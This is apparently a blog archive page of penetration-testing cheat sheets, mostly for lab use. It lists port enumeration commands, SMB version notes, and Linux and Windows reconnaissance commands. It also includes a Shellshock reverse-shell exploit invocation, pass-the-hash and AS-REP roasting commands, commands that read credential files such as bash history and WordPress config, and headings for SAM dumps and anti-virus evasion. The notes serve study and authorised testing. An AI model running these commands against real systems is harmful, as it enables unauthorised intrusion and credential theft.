Month: April 2022
Web Server Enumeration
WEB
PORT 80
PORT 443
…web server ports are not limited to these, look for open http services
…multiple attack vectors
Ports and Explanations
These are the most common ports found in scans…
The following lists number, use, and effective enumeration tools…
PORTS QUICK REFERENCE (DESKTOP BROWSER)
-----------------------------------------------------------------------------
- FIND AVAILABLE NETWORK CONNECTIONS
nmap -sn -oG results.txt 10.X.X.0/24
-----------------------------------------------------------------------------
21 - FTP
Try anonymous logins
-----------------------------------------------------------------------------
25 - SMTP (EMAIL)
telnet 10.11.1.72 25
VRFY user
FINISH SESSION: Ctl + ] / close
VULN - SHELLSHOCK - need valid email address
python2 postfix-shellshock-nc.py <ip> <email> LHOST LPORT
110 - POP
143 - IMAP
587 - SECURE EMAIL
nc -nv 10.11.1.72 25
nc -nvC 10.11.1.72 110
USER enter-user
PASS enter-pass
-----------------------------------------------------------------------------
80 / 443 - WEB
dirb / dirbuster / gobuster / nikto / curl
RFI / LFI / SQLI
-----------------------------------------------------------------------------
88 / 464 - KERBEROS
pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe
-----------------------------------------------------------------------------
111 - NFS mounts (showmount -a / -e)
-----------------------------------------------------------------------------
135 - RPC: Remote Procedure Call
impacket-rpcdump
-----------------------------------------------------------------------------
139 / 445 - SMB (smbmap -H / smbclient -L / nmblookup -A / nbtscan)
nmap --script nbstat.nse <ip>
nmap --script smb-os-discovery <ip>
nmap --script smb-enum-shares -p139,445 <ip>
nmap --script smb-vuln* <ip>
'net' command on kali
crackmapexec smb -u -p
rpcclient -U '' -N
impacket-lookupsid
enum4linux
---------------------------------------------------------------
CIFS (OLD WIND NT 4.0)
SMB 1.0 / SMB1 - WIN2K / WINXP / WIN SRV 2003 WIN SRV 2003 R2
SMB 2.0 / SMB2 - WIN VISTA / WIN SRV 2008
SMB 2.1 / SMB2.1 - WIN 7 / WIN SRV 2008 R2
SMB 3.0 / SMB3 - WIN 8 / WIN SRV 2012
SMB 3.02 / SMB3 - WIN 8.1 / WIN SRV 2012 R2
SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) - WIN SRV 2016 / WIN 10
-----------------------------------------------------------------------------
1433 - MSSQL
nmap --script ms-sql* -p1433
sqsh -S 10.11.1.31 -U sa
-----------------------------------------------------------------------------
389 / 3268 - LDAP (INDICATOR OF DC)
nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse
nmap -p 389 --script ldap-search <ip>
dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220
impacket-GetNPUsers thinc/10.11.1.220 -dc-ip 10.11.1.220 -request
-----------------------------------------------------------------------------
3389 - RDP
rdesktop -u <user> -p <pass> <host>
-----------------------------------------------------------------------------
5985 / 5986 - WINRM
evil-winrm -u <user> -p <pass> -i <host>
-----------------------------------------------------------------------------
Continue reading
Generic Remote Enumeration
All listed items are separate commands unless otherwise specified…
NMAP – STANDARD FIRST APPROACH
…if sudo is required, it will let you know
…otherwise, just use the pasted command
nmap -A -T4 -p- -sS -O -oN nmap_10.10.1.299.txt ip
nmap -A -T4 -p- -sS -OA -oN nmap_10.10.1.299.txt ip
nmap -sU --top-ports 100 -vv ip
nmap -sV -vv -p <ports> --script vuln ip
Continue reading
SQL & SQL Injection
All commands listed here assumes you have a command prompt…
All listed items are separate commands unless otherwise specified…
RESOURCES TO USE DURING TESTING
…this is a MSSQL Practical Injection cheat sheet
…this is another SQL injection sheet
…this is a list of escape characters
…there are plenty more online
Linux System Enumeration
All commands listed here assumes you have a command prompt…
All listed items are separate commands unless otherwise specified…
SIMPLE LINUX ENUMERATION
cat ~/.bash_history
cat /etc/issue
cat /proc/version
whoami
ifconfig
ip addr
hostname
pwd
ls -alh /var/www/html
cat wpconfig.php
Continue reading
Windows System Enumeration
SIMPLE WINDOWS ENUMERATION
All commands listed here assumes you have a command prompt…
All listed items are separate commands unless otherwise specified…
SystemInfo
Network Users and Statistics
Firewall
Services and Tasks
Powershell Policy Unrestricted
View Hotfixes
List Domain Controller
Searches on Windows
Find Modules
PowerUp.ps1
Kerberoast
Juicy Potato
Inspect Files and Folders
Directory Enumeration
One-Liner Ping Script
Change Passwords
Unquoted Service Path
Crackmapexec
Brute-Force Examples
Credential Reuse
PsExec Connections
RPC
Remote Desktop
SQL
Common Enumeration Tools
Enable Windows Installer
SAM Dumps
File Transfers
Anti-Virus Evasion
Restart Windows
SMB Server Enumeration
FIND SMB VERSION
…this can be done using wireshark
…or the techniques seen below
SMB1 – Windows 2000, XP and Windows 2003
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.
enum4linux -a ip
nbtscan ip
…keeping this for reference… used in a particular technique for SMB v2
sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'
# THEN GIVES OUTPUT... LOOK FOR VERSION NUMBERS
interface: tun0 (192.168.119.0/255.255.255.0)
filter: (ip || ip6)
match (JIT): s.?a.?m.?b.?a.*[[:digit:]]
T 192.168.119.299:36106 -> 10.11.10.299:139 [AP] #10
.....SMBr.....C.........................MICROSOFT NETWORKS 3.0..LANMAN1.0..LM1.2X002..DOS LANMAN2.1..LANMAN2.1..Samba..NT LANMAN 1.0..NT LM 0.12..SMB 2.002..SMB 2.???.
Continue reading
FTP Server Enumeration
AUTOMATIC LOGON
~/.netrc
Continue reading
Connection Techniques
STANDARD SSH COMMAND
ssh user@ip
Continue reading